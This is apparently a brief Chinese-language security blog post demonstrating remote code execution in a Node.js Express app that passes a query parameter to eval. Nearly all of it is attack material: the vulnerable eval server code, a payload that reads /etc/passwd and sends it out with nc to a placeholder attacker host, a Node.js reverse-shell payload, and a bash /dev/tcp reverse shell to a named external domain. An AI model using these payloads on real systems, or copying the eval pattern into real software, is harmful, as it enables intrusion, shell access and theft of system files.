MENU

NodeJS RCE

August 20, 2016 • Security

详情

LFI on Demo.PayPal.Com(paypal的文件包含漏洞):

http://www.mottoin.com/87659.html

测试

var express = require('express');  
var app = express();  
app.get('/', function (req, res) {  
    res.send('Hello eval(req.query.q));
    console.log(req.query.q);
});
app.listen(8080, function () {  
    console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});  

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/rinige.com/7890 0>%261"')

参考

Artsploit

Archives QR Code
QR Code for this page
Tipping QR Code